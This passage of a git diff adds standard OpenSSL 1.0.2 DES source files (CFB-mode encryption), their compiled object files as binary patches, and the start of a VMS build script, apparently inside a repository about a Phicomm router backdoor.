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
aEAAC!*yQ+a2ey%Y2krliW7T-c_WuEK{e_qS

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64enc.c
new file mode 100644
index 0000000..7346774
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64enc.c
@@ -0,0 +1,122 @@
+/* crypto/des/cfb64enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+
+/*
+ * The input and output encrypted as though 64bit cfb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+
+void DES_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                       long length, DES_key_schedule *schedule,
+                       DES_cblock *ivec, int *num, int enc)
+{
+    register DES_LONG v0, v1;
+    register long l = length;
+    register int n = *num;
+    DES_LONG ti[2];
+    unsigned char *iv, c, cc;
+
+    iv = &(*ivec)[0];
+    if (enc) {
+        while (l--) {
+            if (n == 0) {
+                c2l(iv, v0);
+                ti[0] = v0;
+                c2l(iv, v1);
+                ti[1] = v1;
+                DES_encrypt1(ti, schedule, DES_ENCRYPT);
+                iv = &(*ivec)[0];
+                v0 = ti[0];
+                l2c(v0, iv);
+                v0 = ti[1];
+                l2c(v0, iv);
+                iv = &(*ivec)[0];
+            }
+            c = *(in++) ^ iv[n];
+            *(out++) = c;
+            iv[n] = c;
+            n = (n + 1) & 0x07;
+        }
+    } else {
+        while (l--) {
+            if (n == 0) {
+                c2l(iv, v0);
+                ti[0] = v0;
+                c2l(iv, v1);
+                ti[1] = v1;
+                DES_encrypt1(ti, schedule, DES_ENCRYPT);
+                iv = &(*ivec)[0];
+                v0 = ti[0];
+                l2c(v0, iv);
+                v0 = ti[1];
+                l2c(v0, iv);
+                iv = &(*ivec)[0];
+            }
+            cc = *(in++);
+            c = iv[n];
+            iv[n] = cc;
+            *(out++) = c ^ cc;
+            n = (n + 1) & 0x07;
+        }
+    }
+    v0 = v1 = ti[0] = ti[1] = c = cc = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb64enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..cb5d42075ecc643f9b18970a0c915641bd72a2a5
GIT binary patch
literal 1960
zcmbu8%}*0i5WrtQpcQechL{?Z^iWMz*t9?tFfo0lg{>))0M&!mr7ep!&_dd60><c}
zYPwX^qc;y;jEVn%7fHZ)QV$-zn0PVKgT!bEA*nOF@4-^aL7ilFW_~;K-t4@$cOtPt
ztHnaNSjc&@9dSxX#=h+bbvH;3kY@6;rG0~59@gH{OHu7TjSp+@=y+7yj7!?DF{$+3
zM=M7rrHcKy4~ir$>~#m0r6v2}(k<@<k(Od!m!#RfEq9;c>vJ98Jq7RHr{bw-#UW`Q
zUSTsa?YE@GyiTlleFZ?I3V2clSX6UJ=@q)z>XoW*sw*+edbGM)`r_zvmE+a2>)VUJ
zUF#!VwDYw#jJ1M`U1e+FM>$fJ`Z~PDmsCsW9k?f@ZsW_;2BWRgs_#mIUZn|ojmj%z
zXkeh<<BO+?Iko8N6T3x!XW(p64+FQm{Gz|-q=5;J*9F=DI&?8ktb{Bhvw@<t8irVI
zjuOkf%hJ~Da6X3Fgn=Jr?~dWD1_jq6YeaBAv_%BZl072$9yEjn|NX|W&|7kZg$e7L
z&`SkB6?`GV6B67Z!4(pmY>8b4m$Z|$>aG_6Y;|u6a^CgMDx3b5I~hhc(zqMy+_49*
z->yxc-p-O{2oIV1)Mo^&9TewXD?I?}ak>X5>8aG29wnC+(<B@jll4%BIKMEb5_u>#
z5~4AAWN>gSGA@tPP%I+rc`PG9WVxUw)6;S~Gc8XgZ_KcU3e4gi*bll{HRSakya^8q
z1oQEmdA<jH6u3{i>H$8)!a`O}rogIs!)CabS7wr;s?4iIoJ^`oBBlxjBBp1vStSQ7
zH>)Zl+|f?GaTZ_C6~(#y?3|KU7l^2@pk(B!d@`$SZTUZr2a53%Yi~*r7z#gEBQkQi
zkG2gIXA=Z9%M*50B?g<o;y(O_xfwsfc<s$ju(`9eEmMm-;0><%uk`__#Wnq)X5ssv
zHbe0F{@nJPm^rn~6U?wq?ge1@H{v}q3$OQ>A^3cL9H+p+t!nF^v;8M{BD1yi3E=h4
z?=u@HKPNmttmXBb*V`Mna<YbcSs(bX?W<FdtoG~xksyPk7?^}Dw?z(uSFe7ZLH^(K
Hg4+5&c@pQs

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb_enc.c
new file mode 100644
index 0000000..bd0e299
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb_enc.c
@@ -0,0 +1,199 @@
+/* crypto/des/cfb_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "e_os.h"
+#include "des_locl.h"
+#include <assert.h>
+
+/*
+ * The input and output are loaded in multiples of 8 bits. What this means is
+ * that if you hame numbits=12 and length=2 the first 12 bits will be
+ * retrieved from the first byte and half the second.  The second 12 bits
+ * will come from the 3rd and half the 4th byte.
+ */
+/*
+ * Until Aug 1 2003 this function did not correctly implement CFB-r, so it
+ * will not be compatible with any encryption prior to that date. Ben.
+ */
+void DES_cfb_encrypt(const unsigned char *in, unsigned char *out, int numbits,
+                     long length, DES_key_schedule *schedule,
+                     DES_cblock *ivec, int enc)
+{
+    register DES_LONG d0, d1, v0, v1;
+    register unsigned long l = length;
+    register int num = numbits / 8, n = (numbits + 7) / 8, i, rem =
+        numbits % 8;
+    DES_LONG ti[2];
+    unsigned char *iv;
+#ifndef L_ENDIAN
+    unsigned char ovec[16];
+#else
+    unsigned int sh[4];
+    unsigned char *ovec = (unsigned char *)sh;
+
+    /* I kind of count that compiler optimizes away this assertioni, */
+    assert(sizeof(sh[0]) == 4); /* as this holds true for all, */
+    /* but 16-bit platforms...      */
+
+#endif
+
+    if (numbits <= 0 || numbits > 64)
+        return;
+    iv = &(*ivec)[0];
+    c2l(iv, v0);
+    c2l(iv, v1);
+    if (enc) {
+        while (l >= (unsigned long)n) {
+            l -= n;
+            ti[0] = v0;
+            ti[1] = v1;
+            DES_encrypt1((DES_LONG *)ti, schedule, DES_ENCRYPT);
+            c2ln(in, d0, d1, n);
+            in += n;
+            d0 ^= ti[0];
+            d1 ^= ti[1];
+            l2cn(d0, d1, out, n);
+            out += n;
+            /*
+             * 30-08-94 - eay - changed because l>>32 and l<<32 are bad under
+             * gcc :-(
+             */
+            if (numbits == 32) {
+                v0 = v1;
+                v1 = d0;
+            } else if (numbits == 64) {
+                v0 = d0;
+                v1 = d1;
+            } else {
+#ifndef L_ENDIAN
+                iv = &ovec[0];
+                l2c(v0, iv);
+                l2c(v1, iv);
+                l2c(d0, iv);
+                l2c(d1, iv);
+#else
+                sh[0] = v0, sh[1] = v1, sh[2] = d0, sh[3] = d1;
+#endif
+                if (rem == 0)
+                    memmove(ovec, ovec + num, 8);
+                else
+                    for (i = 0; i < 8; ++i)
+                        ovec[i] = ovec[i + num] << rem |
+                            ovec[i + num + 1] >> (8 - rem);
+#ifdef L_ENDIAN
+                v0 = sh[0], v1 = sh[1];
+#else
+                iv = &ovec[0];
+                c2l(iv, v0);
+                c2l(iv, v1);
+#endif
+            }
+        }
+    } else {
+        while (l >= (unsigned long)n) {
+            l -= n;
+            ti[0] = v0;
+            ti[1] = v1;
+            DES_encrypt1((DES_LONG *)ti, schedule, DES_ENCRYPT);
+            c2ln(in, d0, d1, n);
+            in += n;
+            /*
+             * 30-08-94 - eay - changed because l>>32 and l<<32 are bad under
+             * gcc :-(
+             */
+            if (numbits == 32) {
+                v0 = v1;
+                v1 = d0;
+            } else if (numbits == 64) {
+                v0 = d0;
+                v1 = d1;
+            } else {
+#ifndef L_ENDIAN
+                iv = &ovec[0];
+                l2c(v0, iv);
+                l2c(v1, iv);
+                l2c(d0, iv);
+                l2c(d1, iv);
+#else
+                sh[0] = v0, sh[1] = v1, sh[2] = d0, sh[3] = d1;
+#endif
+                if (rem == 0)
+                    memmove(ovec, ovec + num, 8);
+                else
+                    for (i = 0; i < 8; ++i)
+                        ovec[i] = ovec[i + num] << rem |
+                            ovec[i + num + 1] >> (8 - rem);
+#ifdef L_ENDIAN
+                v0 = sh[0], v1 = sh[1];
+#else
+                iv = &ovec[0];
+                c2l(iv, v0);
+                c2l(iv, v1);
+#endif
+            }
+            d0 ^= ti[0];
+            d1 ^= ti[1];
+            l2cn(d0, d1, out, n);
+            out += n;
+        }
+    }
+    iv = &(*ivec)[0];
+    l2c(v0, iv);
+    l2c(v1, iv);
+    v0 = v1 = d0 = d1 = ti[0] = ti[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/cfb_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..74cb9d1468ede048736587301f3a2308d7b24a82
GIT binary patch
literal 3880
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
bRKKmLENj;It%9+9{`0i|v1Ps}TK)e4<8q;-

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des-lib.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des-lib.com
new file mode 100644
index 0000000..348f1c0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des-lib.com
@@ -0,0 +1,1005 @@
+$!
+$!  DES-LIB.COM
+$!  Written By:  Robert Byer
+$!               Vice-President
+$!               A-Com Computing, Inc.
+$!               byer@mail.all-net.net
+$!
+$!  Changes by Richard Levitte <richard@levitte.org>
+$!
+$!  This command files compiles and creates the 
+$!  "[.xxx.EXE.CRYPTO.DES]LIBDES.OLB" library.  The "xxx" denotes the machine 
+$!  architecture of ALPHA, IA64 or VAX.
+$!
+$!  It was re-written to try to determine which "C" compiler to try to use
+$!  or the user can specify a compiler in P3.
+$!
+$!  Specify one of the following to build just that part, specify "ALL" to
+$!  just build everything.
+$!
+$!         ALL       To Just Build "Everything".
+$!         LIBRARY   To Just Build The [.xxx.EXE.CRYPTO.DES]LIBDES.OLB Library.
+$!         DESTEST   To Just Build The [.xxx.EXE.CRYPTO.DES]DESTEST.EXE Program.
+$!         SPEED     To Just Build The [.xxx.EXE.CRYPTO.DES]SPEED.EXE Program.
+$!         RPW       To Just Build The [.xxx.EXE.CRYPTO.DES]RPW.EXE Program.
+$!         DES       To Just Build The [.xxx.EXE.CRYPTO.DES]DES.EXE Program.
+$!         DES_OPTS  To Just Build The [.xxx.EXE.CRYPTO.DES]DES_OPTS.EXE Program.
+$!
+$!  Specify either DEBUG or NODEBUG as P2 to compile with or without
+$!  debugging information.
+$!
+$!  Specify which compiler at P3 to try to compile under.
+$!
+$!	   VAXC	 For VAX C.
+$!	   DECC	 For DEC C.
+$!	   GNUC	 For GNU C.
+$!
+$!  If you don't speficy a compiler, it will try to determine which
+$!  "C" compiler to try to use.
+$!
+$!  P4, if defined, sets a compiler thread NOT needed on OpenVMS 7.1 (and up)
+$!
+$!
+$! Make sure we know what architecture we run on.
+$!
+$!
+$! Check Which Architecture We Are Using.
+$!
+$ IF (F$GETSYI("CPU").LT.128)
+$ THEN
+$!
+$!  The Architecture Is VAX
+$!
+$   ARCH := VAX
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  The Architecture Is Alpha, IA64 or whatever comes in the future.
+$!
+$   ARCH = F$EDIT( F$GETSYI( "ARCH_NAME"), "UPCASE")
+$   IF (ARCH .EQS. "") THEN ARCH = "UNK"
+$!
+$! End The Architecture Check.
+$!
+$ ENDIF
+$!
+$! Define The OBJ Directory Name.
+$!
+$ OBJ_DIR := SYS$DISK:[--.'ARCH'.OBJ.CRYPTO.DES]
+$!
+$! Define The EXE Directory Name.
+$!
+$ EXE_DIR :== SYS$DISK:[--.'ARCH'.EXE.CRYPTO.DES]
+$!
+$! Check To Make Sure We Have Valid Command Line Parameters.
+$!
+$ GOSUB CHECK_OPTIONS
+$!
+$! Tell The User What Kind of Machine We Run On.
+$!
+$ WRITE SYS$OUTPUT "Compiling On A ",ARCH," Machine."
+$!
+$! Check To See If The Architecture Specific OBJ Directory Exists.
+$!
+$ IF (F$PARSE(OBJ_DIR).EQS."")
+$ THEN
+$!
+$!  It Dosen't Exist, So Create It.
+$!
+$   CREATE/DIR 'OBJ_DIR'
+$!
+$! End The Architecture Specific OBJ Directory Check.
+$!
+$ ENDIF
+$!
+$! Check To See If The Architecture Specific Directory Exists.
+$!
+$ IF (F$PARSE(EXE_DIR).EQS."")
+$ THEN
+$!
+$!  It Dosen't Exist, So Create It.
+$!
+$   CREATE/DIR 'EXE_DIR'
+$!
+$! End The Architecture Specific Directory Check.
+$!
+$ ENDIF
+$!
+$! Define The Library Name.
+$!
+$ LIB_NAME := 'EXE_DIR'LIBDES.OLB
+$!
+$! Check To See What We Are To Do.
+$!
+$ IF (BUILDALL.EQS."TRUE")
+$ THEN
+$!
+$!  Since Nothing Special Was Specified, Do Everything.
+$!
+$   GOSUB LIBRARY
+$   GOSUB DESTEST
+$   GOSUB SPEED
+$   GOSUB RPW
+$   GOSUB DES
+$   GOSUB DES_OPTS
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!    Build Just What The User Wants Us To Build.
+$!
+$     GOSUB 'BUILDALL'
+$!
+$! End The BUILDALL Check.
+$!
+$ ENDIF
+$!
+$! Time To EXIT.
+$!
+$ EXIT
+$ LIBRARY:
+$!
+$! Tell The User That We Are Compiling.
+$!
+$ WRITE SYS$OUTPUT "Compiling The ",LIB_NAME," Files."
+$!
+$! Check To See If We Already Have A "[.xxx.EXE.CRYPTO.DES]LIBDES.OLB" Library...
+$!
+$ IF (F$SEARCH(LIB_NAME).EQS."")
+$ THEN
+$!
+$! Guess Not, Create The Library.
+$!
+$   LIBRARY/CREATE/OBJECT 'LIB_NAME'
+$!
+$! End The Library Exist Check.
+$!
+$ ENDIF
+$!
+$! Define The DES Library Files.
+$!
+$ LIB_DES = "set_key,ecb_enc,cbc_enc,"+ -
+		"ecb3_enc,cfb64enc,cfb64ede,cfb_enc,ofb64ede,"+ -
+		"enc_read,enc_writ,ofb64enc,"+ -
+		"ofb_enc,str2key,pcbc_enc,qud_cksm,rand_key,"+ -
+		"des_enc,fcrypt_b,read2pwd,"+ -
+		"fcrypt,xcbc_enc,read_pwd,rpc_enc,cbc_cksm,supp"
+$!
+$!  Define A File Counter And Set It To "0".
+$!
+$ FILE_COUNTER = 0
+$!
+$! Top Of The File Loop.
+$!
+$ NEXT_FILE:
+$!
+$! O.K, Extract The File Name From The File List.
+$!
+$ FILE_NAME = F$ELEMENT(FILE_COUNTER,",",LIB_DES)
+$!
+$! Check To See If We Are At The End Of The File List.
+$!
+$ IF (FILE_NAME.EQS.",") THEN GOTO FILE_DONE
+$!
+$! Increment The Counter.
+$!
+$ FILE_COUNTER = FILE_COUNTER + 1
+$!
+$! Create The Source File Name.
+$!
+$ SOURCE_FILE = "SYS$DISK:[]" + FILE_NAME + ".C"
+$!
+$!  Tell The User We Are Compiling The Source File.
+$!
+$ WRITE SYS$OUTPUT "	",FILE_NAME,".C"
+$!
+$! Create The Object File Name.
+$!
+$ OBJECT_FILE = OBJ_DIR + FILE_NAME + "." + ARCH + "OBJ"
+$ ON WARNING THEN GOTO NEXT_FILE
+$!
+$! Check To See If The File We Want To Compile Actually Exists.
+$!
+$ IF (F$SEARCH(SOURCE_FILE).EQS."")
+$ THEN
+$!
+$!  Tell The User That The File Dosen't Exist.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The File ",SOURCE_FILE," Dosen't Exist."
